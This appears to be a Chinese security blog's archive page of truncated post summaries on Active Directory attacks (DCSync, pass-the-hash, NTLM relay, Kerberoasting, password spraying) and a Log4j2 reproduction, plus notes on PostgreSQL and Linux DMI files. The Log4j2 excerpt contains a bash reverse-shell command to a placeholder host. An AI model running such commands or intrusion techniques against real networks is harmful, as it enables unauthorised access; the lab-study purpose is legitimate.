08 2023 档案
摘要:再去的了域林中某个子域的控制权先后,如何通过子域横向移动到林根域进而控制整个域林? 实验如下 xie.com 林根域 shanghai.xie.com和beijing.xie.com都是xie.com的子域。shanghai.xie.com域内有个主机win2008R2,beijing.xie.co
阅读全文
摘要:由于ntlm认证郭晨和kerberos认证过程都是使用用户密码的ntlm hash进行加密,因此当获取到了用户密码的ntlm hash而没有解出明文时,可以利用该ntlm hash进行pth,对内网其他机器进行hash碰撞。通过135ldap或者445横向移动到是用该密码的其他机器上。win2012
阅读全文
摘要:在域中,不同的域控之间,默认每隔15min就会进行一次域数据同步。当一个额外的域控想从其他域控同步数据时,额外域控会像其他域控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service
阅读全文
摘要:发生在ntlm认证的第三步,在response消息中存在net-ntlm hash ,当攻击者获取net-ntlmhash后,可以重放ntlm hash进行中间人攻击 客户端 攻击者 服务端 negotiate -> | -> negotiate challenge <- | <- challeng
阅读全文
摘要:原理 1. 攻击者通过提供一个正常的域用户密码进行身份认证。KDC再验证账户和密码的有效性后,返回一个TGT。用于ST请求 2.攻击者使用获取到的TGT请求针对制定SPN的ST。请求票据的TGS-REQ过程中,指定其支持的加密类型为RC4_HMAC_MD5(ARCFOUR-HMAC-MD5),因为加
阅读全文
摘要:原理:请求包Cname对应的额值是用户名。用户名存在密码正确和密码错误两种情况的asrep返回包不一样。 密码喷洒和普通的爆破的区别在于 普通爆破利用固定的用户名爆破密码。密码喷洒用于 同一个密码爆破不同用户不触发账号锁定策略 工具使用 kerbrute 密码喷洒命令 kerbrute_window
阅读全文
摘要:在无域内有效凭证的情况下,枚举出域内存在的用户名,在对其进行密码喷洒获得域内有效凭证 利用原理:kerberos认证的as-req阶段,请求包cname对应的值是用户名。当用户状态分别为 1.用户存在且启用 KDC_ERR_PREAUTH_REQUIRED 2.用户存在但禁用 KDC_ERR_CLI
阅读全文
摘要:漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti
阅读全文
摘要:postgresql basis the system catalog tables of psotgresql include the following tables: pg_databases:contains information about all databases, such as
阅读全文
摘要:/sys/class/dmi/id是一个linux系统的目录,用于存储有关计算机硬件的DMI(desktop management interface)信息。DMI是一种由系统固件提供的标准接口,收集和报告有关计算机硬件配置的信息 /sys/class/dmi/id 目录下,可以找到以下文件和子目录
阅读全文